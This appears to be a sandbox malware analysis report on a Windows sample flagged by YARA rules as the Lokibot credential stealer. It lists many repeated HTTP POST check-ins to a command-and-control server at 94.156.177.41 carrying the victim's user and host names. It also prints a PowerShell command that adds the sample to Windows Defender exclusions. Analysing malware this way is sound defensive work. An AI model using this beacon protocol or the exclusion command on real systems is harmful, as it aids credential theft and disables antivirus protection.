Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:50.772958040 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:50.892508984 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:52.341576099 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49917	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:52.622878075 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:52.742489100 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:54.151818037 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49922	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:54.411840916 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:54.532238007 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:55.765755892 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49926	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:56.034006119 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:56.154638052 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:57.516748905 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49932	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:57.783540010 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:57.905220985 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:39:59.228705883 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:39:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49937	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:39:59.497380018 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:39:59.617554903 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:01.069856882 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49942	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:01.341367960 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:01.461226940 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:02.745074987 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49945	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:03.000669003 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:03.120404959 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:04.526101112 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49951	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:04.788348913 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:04.910449982 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:06.269392967 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49957	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:06.531886101 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:06.653373957 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:08.104639053 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49961	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:08.359375000 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:08.480379105 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:09.891527891 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49965	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:10.162188053 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:10.283380032 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:11.557749987 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49970	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:11.820862055 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:11.940390110 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:13.393899918 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49976	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:13.660808086 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:13.780404091 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:15.065463066 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49981	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:15.336205959 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:15.455771923 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:16.777442932 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49984	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:17.046169043 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:17.167830944 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:18.529325008 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49990	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:18.804296017 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:18.923856974 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:20.330070019 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49995	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:20.753468990 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:20.873101950 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:22.279743910 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50000	94.156.177.41	80	7716	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 17:40:22.549735069 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 22, 2024 17:40:22.672655106 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
Nov 22, 2024 17:40:24.138025999 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 22 Nov 2024 16:40:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	11:38:15
Start date:	22/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x1f0000
File size:	600'576 bytes
MD5 hash:	66B03D1AFF27D81E62B53FC108806211
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:38:18
Start date:	22/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
Imagebase:	0x310000
File size:	433'152 bytes
